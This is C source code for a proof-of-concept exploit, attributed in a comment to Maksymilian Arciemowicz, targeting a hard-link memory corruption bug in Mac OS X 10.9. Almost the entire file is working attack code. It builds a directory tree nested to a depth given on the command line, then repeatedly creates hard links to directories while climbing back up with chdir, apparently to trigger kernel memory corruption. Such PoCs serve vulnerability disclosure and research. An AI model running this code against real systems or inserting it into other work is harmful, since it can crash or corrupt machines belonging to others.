#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <err.h>
#include <errno.h>
#include <locale.h>
/*
MacOS X 10.9 Hard Link Memory Corruption PoC
Maksymilian Arciemowicz
http://cxsecurity.com/
http://cert.cx/
*/
int mkpath(char *path, mode_t mode, mode_t dir_mode){
struct stat sb;
char *slash;
int done,rv;
done=0;
slash=path;
for(;;){
slash += strspn(slash,"/");
slash += strcspn(slash,"/");
done = (*slash=='\0');
*slash = '\0';
rv = mkdir(path, done ? mode : dir_mode);
if(rv < 0){
int sverrno;
sverrno = errno;
if(stat(path,&sb)<0){
errno=sverrno;
warn("%s",path);
return -1;
}
if(!S_ISDIR(sb.st_mode)){
errno = ENOTDIR;
warn("%s",path);
return -1;
}
} else if (done){
if((chmod(path,mode)== -1)) {
warn("%s",path);
return -1;
}
}
if(done){
break;
}
*slash = '/';
}
return 0;
}
int main(int argc, char *argv[]){
if(argc!=2){
printf("Use it with (int)arg[1]\n");
return 1;
}
int wbita=atoi(argv[1]);
char symn1[]="X1\0";
char symn2[]="X2\0";
char symn3[]="X3\0";
char symn4[]="X4\0";
char symn5[]="X5\0";
char symn6[]="X6\0";
char symn7[]="X7\0";
char symn8[]="X8\0";
char buff[]="B\0";
char cd[]="..\0";
char *sym;
FILE *fp;
int level=0;
mode_t mode,dir_mode;
sym=malloc(((strlen(buff)*2)+2)*sizeof(char));
mode = ((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0));
dir_mode = mode | S_IWUSR |S_IXUSR;
mkpath(buff,mode,dir_mode);
while(1) // Phase 0
if(0!=chdir(buff)){
printf("Phase 0 done\n");
break;
}
else printf("Next %i\n",level++);
strcpy(sym,buff);
strcat(sym,"/");
strcat(sym,buff);
for(int ax=level; ax<wbita; ax++){
mkpath(buff,mode,dir_mode);
printf("Directory created Level: %i\n",ax);
if(0!=chdir(buff)){
printf("Error. chdir() failed.");
break;
}
}
mkpath(buff,mode,dir_mode);
chdir(buff);
mkpath(buff,mode,dir_mode);
chdir(cd);
//Let's create hardlinks and cd .. loop
for(int ax=level; ax<wbita; ax++){
printf("Link1(%s,%s)=%i; cd ..\n",sym,symn1,link(sym,symn1));
printf("Link2(%s,%s)=%i; cd ..\n",sym,symn2,link(sym,symn2));
printf("Link3(%s,%s)=%i; cd ..\n",sym,symn3,link(sym,symn3));
printf("Link4(%s,%s)=%i; cd ..\n",sym,symn4,link(sym,symn4));
printf("Link5(%s,%s)=%i; cd ..\n",sym,symn5,link(sym,symn5));
printf("Link6(%s,%s)=%i; cd ..\n",sym,symn6,link(sym,symn6));
printf("Link7(%s,%s)=%i; cd ..\n",sym,symn7,link(sym,symn7));
printf("Link8(%s,%s)=%i; cd ..\n",sym,symn8,link(sym,symn8));
if(0!=chdir(cd)){
printf("Error. chdir failed!");
break;
}
}
return 0;
}
